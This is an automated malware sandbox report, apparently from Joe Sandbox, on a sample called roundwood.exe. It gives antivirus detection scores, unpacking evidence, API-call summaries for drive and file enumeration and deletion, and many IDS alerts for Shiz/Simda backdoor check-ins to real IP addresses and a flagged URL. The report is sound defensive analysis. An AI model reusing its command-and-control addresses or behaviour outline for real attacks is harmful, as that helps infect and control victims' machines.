Source: https://lysyvan.com/wp-json/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: roundwood.exe

ReversingLabs: Detection: 89%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: roundwood.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Unpacked PE file: 15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.960000.2.unpack
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Unpacked PE file: 25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2650000.3.unpack
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Unpacked PE file: 34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2950000.3.unpack
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Unpacked PE file: 38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2900000.3.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\roundwood.exe	Unpacked PE file: 0.2.roundwood.exe.400000.0.unpack
Source: C:\Windows\apppatch\svchost.exe	Unpacked PE file: 2.2.svchost.exe.400000.0.unpack

Source: roundwood.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:59539 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:59543 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50848 version: TLS 1.2

Source:

Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000000.2392089505.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000005.00000000.2392758187.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2747248970.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2699687212.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000000.2424281862.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000000.2448817598.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000015.00000002.2457320619.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000017.00000002.2467643095.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000019.00000002.2471862859.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001B.00000000.2469981695.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001D.00000000.2472599687.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001F.00000002.2481007099.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000022.00000002.2485967614.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000024.00000002.2496212654.00000000001FE000.00000002.00000001.01000000.00000009.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000026.00000000.2487466914.00000000001FE000.00000002.00000001.01000000.00000009.sdmp

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D1E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	2_2_02D1E1B0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D2D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	2_2_02D2D638
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D29460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	2_2_02D29460
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D1CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	2_2_02D1CC10
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D07400 PathFileExistsA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	2_2_02D07400
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D2D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	2_2_02D2D5A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012FE1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	4_2_012FE1B0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0130D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	4_2_0130D5A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012E7400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	4_2_012E7400
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012FCC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	4_2_012FCC10
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01309460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	4_2_01309460
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0130D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	4_2_0130D638
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E4E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	5_2_00E4E1B0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E59460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	5_2_00E59460
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E37400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	5_2_00E37400
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E4CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	5_2_00E4CC10
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E5D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	5_2_00E5D5A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E5D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	5_2_00E5D638
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_001F6B1C FindFirstFileExW,	8_2_001F6B1C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E8E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	8_2_00E8E1B0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E99460 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	8_2_00E99460
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E77400 OpenMutexA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	8_2_00E77400
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E8CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	8_2_00E8CC10
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E9D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	8_2_00E9D5A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E9D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	8_2_00E9D638

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02D1D060 StrStrIA,memset,memset,SetErrorMode,SetErrorMode,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,PathAddBackslashA,SetErrorMode,

2_2_02D1D060

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:61390
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49718 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49717 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49728 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49717 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49728 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49711 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:63105
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49725 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49725 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49709 -> 3.64.163.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49709 -> 3.64.163.50:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49733 -> 103.150.11.230:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49733 -> 103.150.11.230:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49713 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49713 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.5:49713
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49724 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49711 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49711
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49711
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.5:49713
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49708 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49708 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49712 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49712 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.5:49712
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.5:49712
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49719 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49719 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49715 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49715 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49716 -> 69.162.80.57:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49716 -> 69.162.80.57:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49724 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:50783
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49714 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49714 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49710 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49710 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49741 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49741 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:60684 -> 3.64.163.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:60684 -> 3.64.163.50:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49707 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49707 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:50088
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49722 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49722 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:50316
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:62838
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49730 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49730 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49731 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49731 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:62685 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:62685 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:63518 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:63518 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:64700
